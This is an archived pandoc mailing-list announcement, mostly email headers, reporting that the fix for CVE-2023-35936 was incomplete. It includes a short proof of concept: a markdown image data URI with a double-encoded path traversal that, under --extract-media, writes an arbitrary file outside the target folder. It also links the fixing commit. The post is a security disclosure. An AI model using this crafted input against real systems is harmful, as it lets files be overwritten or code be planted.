From mboxrd@z Thu Jan 1 00:00:00 1970 X-Msuck: nntp://news.gmane.io/gmane.text.pandoc/32980 Path: news.gmane.io!.POSTED.blaine.gmane.org!not-for-mail From: John MacFarlane Newsgroups: gmane.text.pandoc Subject: ANN: fix to CVE-2023-35936 was incomplete Date: Thu, 20 Jul 2023 11:56:41 -0700 Message-ID: <5966AA07-A6E3-4C0B-94EC-760BDEECDE3D@gmail.com> Reply-To: pandoc-discuss-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org Mime-Version: 1.0 (Mac OS X Mail 16.0 \(3696.120.41.1.3\)) Content-Type: text/plain; charset="UTF-8" Injection-Info: ciao.gmane.io; posting-host="blaine.gmane.org:116.202.254.214"; logging-data="37593"; mail-complaints-to="usenet@ciao.gmane.io" To: pandoc-discuss-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org Original-X-From: pandoc-discuss+bncBDW7ZIEHTIIBB3EG42SQMGQEPLIJZPI-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org Thu Jul 20 20:56:49 2023 Return-path: Envelope-to: gtp-pandoc-discuss@m.gmane-mx.org Original-Received: from mail-qv1-f63.google.com ([209.85.219.63]) by ciao.gmane.io with esmtps (TLS1.3:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.92) (envelope-from ) id 1qMYpU-0009W5-3b for gtp-pandoc-discuss@m.gmane-mx.org; Thu, 20 Jul 2023 20:56:48 +0200 Original-Received: by mail-qv1-f63.google.com with SMTP id 6a1803df08f44-62de65b3a5bsf14185836d6.2 for ; Thu, 20 Jul 2023 11:56:48 -0700 (PDT) ARC-Seal: i=2; a=rsa-sha256; t=1689879407; cv=pass; d=google.com; s=arc-20160816; b=qBFCHnOtT0i39xNJhX+F5Sa/oF/8DSduZEmtxDH/hoE31vTjni2ibbNTUAQ9k1BEx2 f4lQZAFjRjCDFQOLN1myA46CUkJFdrijD7Tn/ufUD0q+MpfqGP0EtN7pXSorpHN3IOjc ftfYfCIsH9XhqfLFRKMivTo6k5uea4i3vvrGDCazYLodcjTdUuSVVhZ9DQ2RqyMMfQwI boGOxpbRtOH6GF2+V40zlvaTeQG5YlYo/2hhztPSzXCmsirX/7LlZ1/+rHYGY/GNE+Km ewx6G1GkcL7b6gKSqjln6bcnuEBO4KCVIsXos6Wek5sat30cbIJs5PPuAsja9OtbWUQD /aaA== ARC-Message-Signature: i=2; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=list-unsubscribe:list-subscribe:list-archive:list-help:list-post :list-id:mailing-list:precedence:reply-to:to:date:message-id:subject :mime-version:from:sender:dkim-signature:dkim-signature; bh=IVSZoZufkYjvI/XSlbNW5ZhnS1SYTYuOzHgwC39KqA0=; fh=A7KGSvm30SBY9b2v+N53j+lkchMNZtkZbRzF4WqsV70=; b=WJilqDUWraaJTt9UhoNys+aawyONVh1OZTm2i3inA9r/ASSX+/bJgqgmFCzg1K/aGz Yh0YpIRXFDD6yXaAN7oZONJwJoQ0bjHgK9zBfUH7sukzNov8L7WbNcyYfM7ws78dGRZy Mdq0RLh7EUHgzesKen7HGO9m+ceSRoq7fnnpZS1aYUt8hMrOH3zehTJOEAPq1D+JsziY 1vlxkUITf7er4i/w0EjrmgTvH5HlJrElp1fP7mPQ0MZtD7oosQcfXtuZwn9UuBgccNv3 YBos9sOvrAvUgTviguLKCeyDQX3UOmHMltl3mGB+bUbRdfjx1YqTvZIfDoxNNhStHx5D njsg== ARC-Authentication-Results: i=2; gmr-mx.google.com; dkim=pass header.i=@gmail.com header.s=20221208 header.b=G7ili9hD; spf=pass (google.com: domain of fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org designates 2607:f8b0:4864:20::62c as permitted sender) smtp.mailfrom=fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org; dmarc=pass (p=NONE sp=QUARANTINE dis=NONE) header.from=gmail.com DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=googlegroups.com; s=20221208; t=1689879407; x=1690484207; h=list-unsubscribe:list-subscribe:list-archive:list-help:list-post :list-id:mailing-list:precedence:reply-to :x-original-authentication-results:x-original-sender:to:date :message-id:subject:mime-version:from:sender:from:to:cc:subject:date :message-id:reply-to; bh=IVSZoZufkYjvI/XSlbNW5ZhnS1SYTYuOzHgwC39KqA0=; b=YTdHhUckdwPM4iEF1+lOvZ+SLH7p0XTIbHBDmuy9HvvyJceZ6hoHt5SNsyBc8vCyFs 20PN0B+/njyaQoHVxfyo85oT2d0ZlF2F8/mO5STxMKSKK6U+5rgzk/+j/BEQv3beO3a0 XKmDbjbjoliFtI6zTC+AvdJsF9c5B+FYTVeDD2U0Fk+K87KuHfa+zTLCXHqIOww1nbkg Mcyz6QAJydZbL+QMFRkg92XwOG1BaWYIFJw+c3G5iejZYnLuNmG5ixa+WjyP9CX1jTFr eOtm6GiuuMp4iPsCo/uuhtwmdeAt6FZopTaMz6V+0hS2tlDG8ksR4f7ZBFx6veCrmWd/ fEDQ== DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20221208; t=1689879407; x=1690484207; h=list-unsubscribe:list-subscribe:list-archive:list-help:list-post :list-id:mailing-list:precedence:reply-to :x-original-authentication-results:x-original-sender:to:date :message-id:subject:mime-version:from:from:to:cc:subject:date :message-id:reply-to; bh=IVSZoZufkYjvI/XSlbNW5ZhnS1SYTYuOzHgwC39KqA0=; b=e2XtJUkHYVULw8QkGsBaCnuDkZI+0G/gMU/O6omdOFyN3uq6U8laePloWlB3ou5Tj1 Qq1cmN55Uk4uZycca8FGWHZSZjrkKW4qH2r008d2rrsTX4sCTEAyAQsLbFpfgpudksG9 SKYm4jeKlrenArzKrXs+Unhy6p4lXzicBHLc7L5VPZDrQYkKyh0uBJUZNq5Jj0UC3Y9t MiCq8K9kBwWAui2eB28K0k9fdJvG1iitw6x9YS2PAemZk4F2AlZEQm7IPRDzGjOZUEVD y95i0ZNvvOsw++ulBNKywG3FHwEANbD+24IEDAx68HYVNg0fXIQEW9VgEch0aw0nHj6K Sggg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20221208; t=1689879407; x=1690484207; h=list-unsubscribe:list-subscribe:list-archive:list-help:list-post :x-spam-checked-in-group:list-id:mailing-list:precedence:reply-to :x-original-authentication-results:x-original-sender:to:date :message-id:subject:mime-version:from:x-beenthere:x-gm-message-state :sender:from:to:cc:subject:date:message-id:reply-to; bh=IVSZoZufkYjvI/XSlbNW5ZhnS1SYTYuOzHgwC39KqA0=; b=B3RUc3rGVDdmw8l9H51LalFT08E9GATXP3Mb4OtGTX32LjmtGjMol5jR85UvDX6P0a 5fIhCldeEHwt1wJ2bEWdw5YA37rsIZM6On1KobEH5WxJHZjmcaQFTsYrsc+zmIDeLZ5T MtsTaYi2PD441Vvk59Iyk8yehEdaFMtKsO9HXSnWHbcfPhMAQIIwizh8NZRbtWO06mf1 +muGa9GSy4xC1xo4WOET9vndXOzMUpZoMvOA5UaJ2CGQo+H0m5JgExULrsIUiG6TnI0Y PZrVcYtWK/nFMOnC+HZPue60Ayb6Z7is/dxPXgq Original-Sender: pandoc-discuss-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org X-Gm-Message-State: ABy/qLYdrK6sJQkOCWTgndQ/0KktlMZE6CWutsGqcWW3KsHsT842yweT HW1x6ecrbaJhQTSZBmnCfR4= X-Google-Smtp-Source: APBJJlHwE7xufiJvk9o/PTGUxOPsPHvzdsTo3NVWVIhxygyiBII6wpCJO8rZDJFTRgi5tQw87kkWHA== X-Received: by 2002:a0c:b454:0:b0:635:9a64:2dcb with SMTP id e20-20020a0cb454000000b006359a642dcbmr63652qvf.17.1689879406828; Thu, 20 Jul 2023 11:56:46 -0700 (PDT) X-BeenThere: pandoc-discuss-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org Original-Received: by 2002:a0c:e3cc:0:b0:637:2837:147f with SMTP id e12-20020a0ce3cc000000b006372837147fls1524134qvl.1.-pod-prod-09-us; Thu, 20 Jul 2023 11:56:43 -0700 (PDT) X-Received: by 2002:a05:6102:20e:b0:443:6afe:e842 with SMTP id z14-20020a056102020e00b004436afee842mr11368919vsp.35.1689879403633; Thu, 20 Jul 2023 11:56:43 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1689879403; cv=none; d=google.com; s=arc-20160816; b=R/DyblvhZEu6vB0T0t3CygQLIw5ZSiyLha/wbwkEvfCwHtF/udaRFgyJ7SRz3TIkMl vJVlBDJj/BaUkFN+3uPFzOlSg4yhtpYxWLdt2tNnICNBB5Uewm7Uo3p6e72hoha+mi4u NibiWsCZTdrL4c/s4mwp+XvhqFZqBzUNxErJGExb026gbiYMlIJyqeoGkZ5U80RJK2C7 Gzop+QrPidgeEQdq1Q1q+PrPImVqIgi8hPl7hJnn4Jy+5C38OVph5xKGj+PQI0gH6fe2 PL8GSlgU/poV/hl2nRr/n8X9eG8DgP8mZg2XXEE8eFA89CRY/NmDv8aVf/MEJF1A6zjP jZeg== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=to:date:message-id:subject:mime-version:content-transfer-encoding :from:dkim-signature; bh=TBACI84iFoVB1Av1i1hrLOI2A1hMaWihUOvWM56UCIs=; fh=A7KGSvm30SBY9b2v+N53j+lkchMNZtkZbRzF4WqsV70=; b=lI1LD3XyVSO/CyzbJVfQQaK3gdXo9pDPg/qJwC0k00mCCAFPEwrjP+IE12n/+Lb/ly 9/nrfd9U6N6M62zM/pkIZoZ9y/earlTWEA5NZB8DcBCcqIdL2bc6yqQQilJNJE87t0Ud UtsDb+uikS2Mc8zAJXLBLinJ5fx30zU/jtvD/L2WIQFfrur8oosjVn5fhPslD1+ZZLSX +1RoKO2EJ2RyaUepHq8UBk3g6t8uT6UlnJ1nEcSHW4m4JaoIGO8GIGb3qWxxVspijTKT jbEDiDX00OPI8sfqgG3p5hrt3Let1qEWO9x6pvQEmHYcxzr7eyUkUcevdLV6GC9F4q8i HmAQ== ARC-Authentication-Results: i=1; gmr-mx.google.com; dkim=pass header.i=@gmail.com header.s=20221208 header.b=G7ili9hD; spf=pass (google.com: domain of fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org designates 2607:f8b0:4864:20::62c as permitted sender) smtp.mailfrom=fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org; dmarc=pass (p=NONE sp=QUARANTINE dis=NONE) header.from=gmail.com Original-Received: from mail-pl1-x62c.google.com (mail-pl1-x62c.google.com. [2607:f8b0:4864:20::62c]) by gmr-mx.google.com with ESMTPS id r4-20020a67cd84000000b004437e608de4si98785vsl.2.2023.07.20.11.56.43 for (version=TLS1_3 cipher=TLS_AES_128_GCM_SHA256 bits=128/128); Thu, 20 Jul 2023 11:56:43 -0700 (PDT) Received-SPF: pass (google.com: domain of fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org designates 2607:f8b0:4864:20::62c as permitted sender) client-ip=2607:f8b0:4864:20::62c; Original-Received: by mail-pl1-x62c.google.com with SMTP id d9443c01a7336-1b9e93a538dso6855815ad.3 for ; Thu, 20 Jul 2023 11:56:43 -0700 (PDT) X-Received: by 2002:a17:902:a615:b0:1ac:a28e:4b29 with SMTP id u21-20020a170902a61500b001aca28e4b29mr105950plq.26.1689879402380; Thu, 20 Jul 2023 11:56:42 -0700 (PDT) Original-Received: from smtpclient.apple ([2601:644:4701:23f0:10bc:b98e:7790:ecb2]) by smtp.gmail.com with ESMTPSA id f13-20020a170902ce8d00b001b8a8154f3fsm1727624plg.270.2023.07.20.11.56.41 for (version=TLS1_2 cipher=ECDHE-ECDSA-AES128-GCM-SHA256 bits=128/128); Thu, 20 Jul 2023 11:56:41 -0700 (PDT) X-Mailer: Apple Mail (2.3696.120.41.1.3) X-Original-Sender: fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org X-Original-Authentication-Results: gmr-mx.google.com; dkim=pass header.i=@gmail.com header.s=20221208 header.b=G7ili9hD; spf=pass (google.com: domain of fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org designates 2607:f8b0:4864:20::62c as permitted sender) smtp.mailfrom=fiddlosopher-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org; dmarc=pass (p=NONE sp=QUARANTINE dis=NONE) header.from=gmail.com Precedence: list Mailing-list: list pandoc-discuss-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org; contact pandoc-discuss+owners-/JYPxA39Uh5TLH3MbocFFw@public.gmane.org List-ID: X-Google-Group-Id: 1007024079513 List-Post: , List-Help: , List-Archive: , List-Unsubscribe: , Xref: news.gmane.io gmane.text.pandoc:32980 Archived-At: Guilhem Moulin noticed that the fix in pandoc 3.1.4 to CVE-2023-35936 was incomplete. An attacker could get around it by double-encoding the malicious extension to create or override arbitrary files. $ echo '![](data://image/png;base64,cHJpbnQgImhlbGxvIgo=;.lua+%252f%252e%252e%252f%252e%252e%252fb%252elua)' >b.md $ .cabal/bin/pandoc b.md --extract-media=bar

$ cat b.lua print "hello" $ find bar bar/ bar/2a0eaa89f43fada3e6c577beea4f2f8f53ab6a1d.lua+ This vulnerability is fixed in the main branch of the repository: https://github.com/jgm/pandoc/commit/eddedbfc14916aa06fc01ff04b38aeb30ae2e625 I will put out a new release soon.